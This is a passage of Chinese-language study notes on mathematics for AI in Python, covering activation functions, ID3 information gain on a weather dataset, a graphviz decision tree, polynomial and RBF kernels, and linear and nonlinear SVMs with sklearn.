    • 非原点中心对称, 不利于下层的计算(可以直接-0.5?)

    • 含有幂运算, 相对耗时较长

    tanh 函数

    $f(x)=\frac{e^x - e{-x}}{ex + e^{-x}}$

    $f’(x) = 1 - \tanh^2x$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    import numpy as np
    import matplotlib.pyplot as plt
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def tanh(x):
    return (np.exp(x) - np.exp(-x)) / (np.exp(x) + np.exp(-x))


    def tanh_derivative(x):
    return 1 - tanh(x) * tanh(x)


    plt.figure(figsize=(8, 5), dpi=80)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks([0.2, 0.4, 0.6, 0.8, 1.0])
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = tanh(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="tanh funciton")

    Y2 = tanh_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="tanh derivative funciton")

    ax.set_title("tanh function & tanh derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    • 关于原点中心对称, 收敛较好

    • 存在梯度消失问题

    • 含有幂运算, 相对耗时

    ReLU 函数

    $f(x) = max(0, x)$

    $f’(x) = \left{\begin{matrix}
    1,x>0
    \ 0,x\le0
    \end{matrix}\right.$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    import numpy as np
    import matplotlib.pyplot as plt
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def relu(x):
    return np.where(x <= 0, 0, x)


    def relu_derivative(x):
    return np.where(x <= 0, 0, 1)


    plt.figure(figsize=(8, 5), dpi=80)
    plt.xlim(-1.5, 1.5)
    plt.ylim(0, 1)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks(np.arange(0, 1.4, 0.2))
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = relu(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="ReLU funciton")

    Y2 = relu_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="ReLU derivative funciton")

    ax.set_title("ReLU function & ReLU derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    • 解决梯度消失的问题

    • 计算速度快

    • 非原点对称, 会影响收敛速度(但是比 Sigmoid 和 tanh 快)

    • 输入值小于 0 时, 永远不会被激活

    Leaky ReLU (PReLU)
    • 解决 ReLU 算法在 x 轴负方向为 0 可能导致部分神经元无法激活的问题

    • 理论上具有 ReLU 的所有优点

    $f(x)=max(\alpha x, x)$($\alpha$通常取 0.01)

    $f(x)=max(0.01x, x)$

    $f(x)=\left{\begin{matrix}
    1,x>0
    \ 0.01,x\le0
    \end{matrix}\right.$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    import numpy as np
    import matplotlib.pyplot as plt
    from matplotlib.ticker import MultipleLocator, FormatStrFormatter


    def prelu(x):
    return np.where(x <= 0, 0.01 * x, x)


    def prelu_derivative(x):
    return np.where(x <= 0, 0.01, 1)


    plt.figure(figsize=(8, 5), dpi=80)
    plt.xlim(-1.5, 1.5)
    plt.ylim(0, 1)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks(np.arange(0, 1.4, 0.2))
    ax.xaxis.set_minor_locator(MultipleLocator(0.5))
    ax.yaxis.set_minor_locator(MultipleLocator(0.1))

    X = np.linspace(-10, 10, 201, endpoint=True)
    print("X: ", X)

    Y1 = prelu(X)
    plt.plot(X, Y1, color="green", linewidth=2, label="PReLU funciton")

    Y2 = prelu_derivative(X)
    plt.plot(X, Y2, color="red", linewidth=2, linestyle="dashed", label="PReLU derivative funciton")

    ax.set_title("PReLU function & PReLU derivative funciton", fontsize=16)
    plt.legend()
    plt.show()
    X:  [-10.   -9.9  -9.8  -9.7  -9.6  -9.5  -9.4  -9.3  -9.2  -9.1  -9.   -8.9  -8.8  -8.7  -8.6  -8.5  -8.4  -8.3  -8.2  -8.1  -8.   -7.9  -7.8  -7.7  -7.6  -7.5  -7.4  -7.3  -7.2  -7.1  -7.   -6.9  -6.8  -6.7  -6.6  -6.5  -6.4  -6.3  -6.2  -6.1  -6.   -5.9  -5.8  -5.7  -5.6  -5.5  -5.4  -5.3  -5.2  -5.1  -5.   -4.9  -4.8  -4.7  -4.6  -4.5  -4.4  -4.3  -4.2  -4.1  -4.   -3.9  -3.8  -3.7  -3.6  -3.5  -3.4  -3.3  -3.2  -3.1  -3.   -2.9  -2.8  -2.7  -2.6  -2.5  -2.4  -2.3  -2.2  -2.1  -2.   -1.9  -1.8  -1.7  -1.6  -1.5  -1.4  -1.3  -1.2  -1.1  -1.   -0.9  -0.8  -0.7  -0.6  -0.5  -0.4  -0.3  -0.2  -0.1   0.    0.1   0.2   0.3   0.4   0.5   0.6   0.7   0.8   0.9   1.    1.1   1.2   1.3   1.4   1.5   1.6   1.7   1.8   1.9   2.    2.1   2.2   2.3   2.4   2.5   2.6   2.7   2.8   2.9   3.    3.1   3.2   3.3   3.4   3.5   3.6   3.7   3.8   3.9   4.    4.1   4.2   4.3   4.4   4.5   4.6   4.7   4.8   4.9   5.    5.1   5.2   5.3   5.4   5.5   5.6   5.7   5.8   5.9   6.    6.1   6.2   6.3   6.4   6.5   6.6   6.7   6.8   6.9   7.    7.1   7.2   7.3   7.4   7.5   7.6   7.7   7.8   7.9   8.    8.1   8.2   8.3   8.4   8.5   8.6   8.7   8.8   8.9   9.    9.1   9.2   9.3   9.4   9.5   9.6   9.7   9.8   9.9  10. ]

    png

    11.3 综合案例——分类算法中信息熵的应用

    用 ID3 分类算法, 按照信息熵的减少幅度来确定分类的方向

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import pandas as pd
    import numpy as np

    data = [np.array(["Sunny", "Hot", "High", "Weak", "No"])]
    data.append(np.array(["Sunny", "Hot", "High", "Strong", "No"]))
    data.append(np.array(["Overcast", "Hot", "High", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Mild", "High", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Cool", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Cool", "Normal", "Strong", "No"]))
    data.append(np.array(["Overcast", "Cool", "Normal", "Strong", "Yes"]))
    data.append(np.array(["Sunny", "Mild", "High", "Weak", "No"]))
    data.append(np.array(["Sunny", "Cool", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Mild", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Sunny", "Mild", "Normal", "Strong", "Yes"]))
    data.append(np.array(["Overcast", "Mild", "High", "Strong", "Yes"]))
    data.append(np.array(["Overcast", "Hot", "Normal", "Weak", "Yes"]))
    data.append(np.array(["Rain", "Mild", "High", "Strong", "No"]))
    df = pd.DataFrame(data, columns = ["Outlook", "Temp.",
    "Humidity", "Wind", "Decision"], index=range(1, 15))
    df.index.name = 'Day'
    df
    Outlook Temp. Humidity Wind Decision
    Day
    1 Sunny Hot High Weak No
    2 Sunny Hot High Strong No
    3 Overcast Hot High Weak Yes
    4 Rain Mild High Weak Yes
    5 Rain Cool Normal Weak Yes
    6 Rain Cool Normal Strong No
    7 Overcast Cool Normal Strong Yes
    8 Sunny Mild High Weak No
    9 Sunny Cool Normal Weak Yes
    10 Rain Mild Normal Weak Yes
    11 Sunny Mild Normal Strong Yes
    12 Overcast Mild High Strong Yes
    13 Overcast Hot Normal Weak Yes
    14 Rain Mild High Strong No
    名称解释
    Day日期
    OutLook阴晴
    Temp.气温
    Humidity湿度
    Wind风力
    Decision目标列/标识列
    (1) 数据集的信息熵的计算

    $H(D)=-\Sigma^2 _ {k=1}\frac{|C _ k|}{|D|}\log _ 2 \frac{C _ k}{|D|}$

    $= - \frac{|C _ {yes}|}{|D|}\log _ 2\frac{|C _ {yes}|}{|D|} - \frac{|C _ {no}|}{|D|} \log _ 2\frac{|C _ {no}|}{|D|}$

    $|D|=14,|C _ {yes}|=9, |C _ {no}|=5$

    $H(D)=-\frac{9}{14}\log _ 2 \frac{9}{14} - \frac{5}{14}\log _ 2 \frac{5}{14}= 0.940$

    1
    2
    3
    4
    5
    D = len(df)
    C_yes = len(df[df.Decision == "Yes"])
    C_no = len(df[df.Decision == "No"])
    H_D = - (C_yes / D) * np.log2(C_yes / D) - (C_no / D) * np.log2(C_no / D)
    H_D
    0.9402859586706311
    (2) 对数据集进行分类之后的信息熵

    按照某一属性 A:

    $H(D|A)=\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}H(D _ i)=-\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}\Sigma^K _ {k=1}\frac{|C _{ik}|}{|D _ i|}\log _2\frac{|D _{ik}|}{|D _ i|}$

    针对某一属性 A, 分类后不确定性减少, 由此产生的信息增益:

    $g(D|A)=H(D)-H(D|A)$

    属性 Wind 的信息熵:

    $H(D|Wind)=\Sigma^n _ {i=1}\frac{|D _ i|}{|D|}H(D _ i)=\frac{|D _ {strong}|}{|D|}H(D _ {strong}) + \frac{|D _ {weak}|}{|D|}H(D _ {weak})$

    对于 Wind=Strong 的数据集的信息熵:

    $H(D _ {strong})=\Sigma^2 _ {k=1}\frac{|C _ {strong,k}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,k}|}{|D _ {strong}|}$

    $=-\frac{|C _ {strong,yes}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,yes}|}{|D _ {strong}|}-\frac{|C _ {strong,no}|}{|D _ {strong}|}\log _ 2\frac{|C _ {strong,no}|}{|D _ {strong}|}$

    $=-\frac{3}{6}\log _ 2\frac{3}{6}-\frac{3}{6}\log _ 2\frac{3}{6}=1$

    1
    2
    3
    4
    5
    6
    D_strong = len(df[df.Wind == "Strong"])
    C_strong_yes = len(df[(df.Wind == "Strong") & (df.Decision == "Yes")])
    C_strong_no = len(df[(df.Wind == "Strong") & (df.Decision == "No")])
    H_D_strong = -(C_strong_yes / D_strong) * np.log2(C_strong_yes / D_strong) - \
    (C_strong_no / D_strong) * np.log2(C_strong_no / D_strong)
    H_D_strong
    1.0
    1
    2
    3
    4
    5
    6
    D_weak = len(df[df.Wind == "Weak"])
    C_weak_yes = len(df[(df.Wind == "Weak") & (df.Decision == "Yes")])
    C_weak_no = len(df[(df.Wind == "Weak") & (df.Decision == "No")])
    H_D_weak = -(C_weak_yes / D_weak) * np.log2(C_weak_yes / D_weak) - \
    (C_weak_no / D_weak) * np.log2(C_weak_no / D_weak)
    H_D_weak
    0.8112781244591328
    1
    2
    H_D_Wind = D_strong / D * H_D_strong + D_weak / D * H_D_weak
    H_D_Wind
    0.8921589282623617

    $g(D|Wind)=H(D)-H(D|Wind)=0.940-0.892=0.048$

    1
    H_D - H_D_Wind
    0.04812703040826949

    同理,

    $g(D|Outlook)=0.246$

    $g(D|Temp)=0.029$

    $g(D|Humidity)=0.151$

    ID3 算法是一种贪心算法,用来构造决策树。ID3 算法起源于概念学习系统(CLS),以信息熵的下降速度为选取测试属性的标准,即在每个节点选取还尚未被用来划分的具有最高信息增益的属性作为划分标准,然后继续这个过程,直到生成的决策树能完美分类训练样例。ID3 算法_百度百科

    1
    pip install graphviz
    Collecting graphviz  Using cached graphviz-0.20-py3-none-any.whl (46 kB)Installing collected packages: graphvizSuccessfully installed graphviz-0.20Note: you may need to restart the kernel to use updated packages.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    from PIL import Image
    import matplotlib.pyplot as plt
    from graphviz import Digraph

    # 实例化一个 Digraph 对象(有向图),name:生成的图片的图片名,format:生成的图片格式
    dot = Digraph(name="test", comment="the test", format="png")

    # 生成图片节点,name:这个节点对象的名称,label:节点名,color:画节点的线的颜色
    dot.node(name='Outlook', shape="record", label='Outlook')
    dot.node(name='Overcast', shape="plaintext", label='Overcast')
    dot.node(name='Yes1', shape="plaintext", label='Yes')

    dot.node(name='Humidity', shape="record", label='Humidity')
    dot.node(name='Yes2', shape="plaintext", label='Yes')
    dot.node(name='No1', shape="plaintext", label='No')

    dot.node(name='Wind', shape="record", label='Wind')
    dot.node(name='Yes3', shape="plaintext", label='Yes')
    dot.node(name='No2', shape="plaintext", label='No')

    # 在节点之间画线,label:线上显示的文本,color:线的颜色
    dot.edge('Outlook', 'Humidity', arrowhead="none", label="Sunny")
    dot.edge('Humidity', 'No1', arrowhead="none", label="High")
    dot.edge('Humidity', 'Yes2', arrowhead="none", label="Normal")
    dot.edge('Outlook', 'Overcast', arrowhead="none")
    dot.edge('Overcast', 'Yes1', arrowhead="none")
    dot.edge('Outlook', 'Wind', arrowhead="none", label="Rain")
    dot.edge('Humidity', 'No2', arrowhead="none", label="Strong")
    dot.edge('Humidity', 'Yes3', arrowhead="none", label="Weak")

    dot.render(filename='test', view=False)

    plt.figure()
    img = Image.open("test.png")
    plt.imshow(img)
    plt.axis('off')
    plt.show()

    png

    ID3 决策树分类算法的结果

    不太会画, 先这样吧…

    ]]>
    @@ -10077,7 +10077,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8010/ - 正文

    10 数据的空间变换——核函数变换

    10.1 相关知识简介

    10.1.1 超平面

    超平面(Hyper Plane)的本质是自由度比所在空间的维度小 1,也就是(n-1)维度

    n 维空间$F^n$中超平面表示为$a _ 1 x _ 1 + … + a _ n x _n =b$定义的子集, 其中$a _ 1,…,a _ n \in F$是不全为零的常数

    也可表示为$\mathbf{w\cdot x}+b=0$, 其中$\mathbf{w}$与$\mathbf{x}$是 n 维列向量, $\mathbf{w}=[w _ 1,w _ 2,…,w _ n]^T,\mathbf{x}=[x _ 1,x _ 2,…,x _ n]^T$

    • $\mathbf{w}$既可以看作超平面的法向量, 也可以看作是参数, 决定了超平面的方向

    • $\mathbf{x}$为超平面上的点

    • $b$是一个实数, 代表超平面到原点的距离

    • $\mathbf{w\cdot x}$表示向量$\mathbf{w}$与$\mathbf{x}$的内积, 结果为一个标量

    • 向量的内积可以转换为矩阵的乘积, 所以$\mathbf{w\cdot x}=\mathbf{w}^T\mathbf{x}, \mathbf{w}^T$表示$\mathbf{w}$的转置

    • 超平面将空间划分为 3 部分, 即超平面本身$\mathbf{w\cdot x}+b=0$, 超平面上部$\mathbf{w\cdot x}+b>0$, 超平面下部$\mathbf{w\cdot x}+b<0$

    10.1.2 线性分类

    若一个分类超平面可以将两类样本完全分开, 则称这些样本是"线性可分"的, 椭圆在二维空间内不是分类超平面(不是一维), 不是线性可分的

    10.1.3 升维

    把样本从原输入低维空间向高维特征空间作映射,使得数据的维度增大

    非线性可分问题可以通过升维, 找到合适的映射函数将低维的向量$\mathbf{x}$变换为高维的向量$\mathbf{x}‘$, 然后在高维空间中,求向量$\mathbf{x’}$与向量$\mathbf{w}$的内积, 再与 b 相加, 得到分类超平面以及线性模型, 从而进行分类或回归, 使低维输入空间非线性可分问题变为高维特征空间的线性可分

    10.2 核函数的引入

    10.3.1 核函数定义

    设$\chi$是输入空间(欧氏空间或离散集合), H 为特征空间(希尔伯特空间, (可以直接理解成更高维的空间?)), 若存在一个从$\chi$到 H 的映射,$f(\mathbf{x}):\chi \to H$,使得对所有的$\mathbf{x},\mathbf{y}\in \chi$函数$K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$, 则称$K(\mathbf{x}, \mathbf{y})$为核函数

    任何半正定($\ge 0$)的函数都可以作为核函数

    10.3.3 核函数的特点

    • 在原空间进行计算, 避免"维数灾难", 大大减小计算量, 有效处理高维输入

    10.4 常用核函数

    名称说明
    线性核函数对数据不进行任何变换, 不需要设置任何参数, 速度快, 用于线性可分, 适用于维度很大、样本数量差不多的数据集, 也可手动升维, 再使用线性核函数
    多项式核函数偏线性, 非常适合用于图像处理, 可调节参数获得好的结果
    高斯径向基核函数偏非线性, 适用范围较广, 是 SVM 的默认核函数, 适用于维度较低和样本数量一般的数据集

    10.4.1 线性核函数

    $$K(\mathbf{x},\mathbf{y})=\mathbf{x}\cdot \mathbf{y}$$

    线性核函数是最简单的核函数, 此时的映射函数为$f(\mathbf{z})=z$

    10.4.2 多项式核函数

    $$K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+c \right ]^d$$

    • $\gamma > 0$, 一般等于 1 /类别数, 表示对内积$(\mathbf{x}\cdot \mathbf{y})$进行放缩

    • c 代表常数项, c>0 时称为非齐次多项式

    • d 代表项式的阶次, 一般设 d=2, 若 d 取值过高, 学习的复杂性也会过高, 容易出现过拟合的现象.

    • 多项式核函数对应的映射后的特征维度为$C ^d _ {n+d}$, n 为$\mathbf{x}$的维度

    常用的多项式核函数

    $K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+1 \right ]^2$

    $K(\mathbf{x},\mathbf{y})=\left [ (\mathbf{x}\cdot \mathbf{y})+1\right ]2=(\Sigman _ {i=1}\mathbf{x} _ i \mathbf{y} _ i + 1)^2$

    $={\color{Red}{\Sigma^n _ {i=1} \mathbf{x}^2 _ i \mathbf{y}^2 _ i}} + {\color{Blue}{\Sigma^n _ {i=2}\Sigma^{i-1} _ {j=1}(\sqrt 2 \mathbf{x} _ i\mathbf{x} _ j)(\sqrt 2 \mathbf{y} _ i\mathbf{y} _ j)}}+ {\color{Green}{\Sigma^n _ {i=1}(\sqrt 2 \mathbf{x} _ i)(\sqrt 2 \mathbf{y} _ i)}} + {\color{Purple}1}$

    所以$f(\mathbf{z})=\left[{\color{Red}{z^2 _ n}}, {\color{Blue}{z^2 _ {n-1},…,z^2 _ 1, \sqrt 2 z _ n z _ {n-1},…,\sqrt 2 z _2 z _1, \sqrt 2z _n}}{\color{Green}{,\sqrt 2z _ {n-1}}}{\color{Purple}{,1}}\right]$

    使用该函数, 设向量$\mathbf{X}=[1, 2, 3, 4], \mathbf{Y}=[5, 6, 7, 8]$,原输入空间的维度为 4, 通过映射后特征维度将达到$C ^4 _ {4+2}=15$, 验证$K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$

    import numpy as np


    def f(Z):
    """
    映射函数, 时间复杂度 O(n^2)?
    """
    Z1 = Z ** 2
    Z_shape = np.shape(Z)[1] - 1
    Z0 = []
    for i in range(Z_shape, 0, -1):
    for j in range(i - 1, -1, -1):
    xy = Z[0, i] * Z[0, j] * 2 ** 0.5
    Z0.append(xy)
    Z2 = np.array(Z0).reshape(1, -1)
    Z3 = Z * 2 ** 0.5
    return np.hstack((Z1 ,Z2, Z3, [[1]]))


    X = np.array([[1,2,3,4]]) # 4 维行向量
    Y = np.array([[5,6,7,8]])
    # 使用多项式核函数计算
    XY_poly = (X.dot(Y.T) + 1) ** 2
    print("使用多项式核函数计算的结果为:", XY_poly)
    # 使用映射的计算
    X1 = f(X)
    Y1 = f(Y)
    print("使用映射计算的结果为:", X1.dot(Y1.T))
    print("输出 X 的映射值为:\n",X1)
    print("输出 Y 的映射值为:\n",Y1)
    print("原输入空间的维度为:", np.shape(X)[1])
    print("映射后特征空间的维度为:", np.shape(X1)[1])
    使用多项式核函数计算的结果为:[[5041]]使用映射计算的结果为:[[5041.]]输出 X 的映射值为: [[ 1.          4.          9.         16.         16.97056275 11.3137085   5.65685425  8.48528137  4.24264069  2.82842712  1.41421356  2.82842712   4.24264069  5.65685425  1.        ]]输出 Y 的映射值为: [[25.         36.         49.         64.         79.19595949 67.88225099  56.56854249 59.39696962 49.49747468 42.42640687  7.07106781  8.48528137   9.89949494 11.3137085   1.        ]]原输入空间的维度为:4映射后特征空间的维度为:15

    10.4.3 高斯径向基核函数

    $$K(\mathbf{x},\mathbf{y})=e^{(-\frac{\left |\mathbf{x}-\mathbf{y}\right | 2}{2\sigma2})}$$

    此时映射函数映射之后是无穷维的

    10.6 SVM 原理

    SVM = Support Vector Machine 是支持向量

    SVC = Support Vector Classification 就是支持向量机用于分类

    SVR = Support Vector Regression.就是支持向量机用于回归分析

    参考: python 机器学习 | SVM 算法介绍及实现

    10.6.7 线性可分 SVM 的实现

    给定训练数据集, 其正例点是$x _ 1 = (4, 3),x _ 2 = (3, 3)$,负例点是$x _ 3 = (1, 1)$, 利用 sklearn 中的 SVC 库, 求出支持向量机, 支持向量机的个数、参数, 并对点$(4, 5)$、$(0, 0)$和$(1, 3)$进行预测.

    import numpy as np
    from sklearn.svm import SVC # 导入 SVC 模型
    import matplotlib.pyplot as plt
    import matplotlib as mpl

    # 导入数据
    train_x = np.array([[4, 3], [3, 3], [1, 1]])
    train_y = np.array([1, 1, -1]) # 写出对应的类别
    print("训练集(最右一列为标签):\n", np.hstack((x, y.reshape(3, 1))))

    # 调用 SVC, 训练算法
    model = SVC(kernel="linear") # 实例化, 设置的核函数为线性核函数
    model.fit(x, y) # 用训练集数据训练模型, 和上一句配合使用

    # 预测数据
    test_x = np.array([[4, 5], [0, 0], [1, 3]])
    test_y = model.predict(test_x)
    print("预测数据[4, 5], [0, 0], [1, 3]的类型值分别是", test_y)

    # 相关方法和返回值
    w = model.coef_[0] # 获取 w
    a = -w[0] / w[1] # 斜率
    b = model.intercept_
    print("支持向量:\n",model.support_vectors_) # 打印支持向量
    print("支持向量的标号:",model.support_) # 打印支持向量的标号
    print("每类支持向量的个数:",model.n_support_) # 每类支持向量的个数
    print("数据集 X 到分类超平面的距离:",model.decision_function(x))
    print("参数(法向量)w =", w)
    print("分类线的斜率 a =", a)
    print("分类平面截距 b:", b) # 超平面的截距值(常数值)。
    print("系数",model.coef_) # 每个特征系数(重要性),只有 LinearSVC 核函数可用
    print("超平面方程为{}x + {}y {} = 0".format(w[0], w[1], b[0]))

    # 绘图
    mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    mpl.rcParams['axes.unicode_minus'] = False
    plt.figure()
    plt.axis("equal")
    for i in range(0, len(train_x)):
    plt.scatter(train_x[i][0], train_x[i][1], color="red", marker=["x", "o"][int(train_y[i] * 0.5 + 0.5)])
    for i in range(0, len(test_x)):
    plt.scatter(test_x[i][0], test_x[i][1], color="blue", marker=["x", "o"][int(test_y[i] * 0.5 + 0.5)])
    plt.plot(np.linspace(0, 4, 2), a * np.linspace(0, 4, 2) - b / w[1])
    l1 = plt.scatter(0, 0, color="red") # 设置图例
    l2 = plt.scatter(0, 0, color='red')
    plt.legend(handles=[plt.scatter(0, 0, color="red", marker="o"), plt.scatter(0, 0, color="red", marker="x"),
    plt.scatter(0, 0, color="blue", marker="o"), plt.scatter(0, 0, color="blue", marker="x")],
    labels=['训练集正例点', '训练集负例点', '测试集正例点', '测试集负例点'] , loc='best') # 显示图例
    plt.show()
    训练集(最右一列为标签): [[ 4  3  1] [ 3  3  1] [ 1  1 -1]]预测数据[4, 5], [0, 0], [1, 3]的类型值分别是 [ 1 -1  1]支持向量: [[1. 1.] [3. 3.]]支持向量的标号:[2 1]每类支持向量的个数:[1 1]数据集 X 到分类超平面的距离:[ 1.5  1.  -1. ]参数(法向量)w = [0.5 0.5]分类线的斜率 a = -1.0分类平面截距 b:[-2.]系数 [[0.5 0.5]]超平面方程为 0.5x + 0.5y -2.0 = 0

    png

    10.7 非线性 SVM 与核函数的引入

    参考: 核函数与非线性支持向量机(SVM)

    10.7.2 非线性 SVM 的实现

    (1) 调用相关的库
    #调用相关的库:
    import numpy as np
    from sklearn.svm import SVC
    import matplotlib.pyplot as plt
    from sklearn.datasets import make_circles # 画圆圈的库
    import matplotlib as mpl

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    (2) 通过函数 plot_decision_boundary()实现散点图和支持向量的绘图
    def plot_decision_boundary (model, X, y, h=0.03, draw_SV=True, title='decision_boundary'):
    """
    画分类数据集
    :param model:
    :param X:
    :param y:
    :param h: 步长
    :param draw_SV:
    :param title: 标题
    """
    X_min, X_max = X[:,0].min() - 1, X[:,0].max() + 1
    y_min, y_max = X[:,1].min() - 1, X[:, 1].max() + 1
    # 画决策边界,需要有网格,利用 np.meshgrid()生成一个坐标矩阵
    """
    语法:X,Y = numpy.meshgrid(x, y)
    输入的 x,y,就是网格点的横纵坐标列向量(非矩阵)
    输出的 X,Y,就是坐标矩阵。
    """
    xx, yy = np.meshgrid(np.arange(X_min, X_max, h),np.arange(y_min, y_max, h))
    # 预测坐标矩阵中每个点所属的类别
    label_predict = model.predict(np.stack((xx.flat, yy.flat), axis=1))
    # 将结果放入彩色图中
    label_predict = label_predict.reshape(xx.shape) # 使之与输入的形状相同
    plt.title(title)
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(()) # 隐藏坐标轴
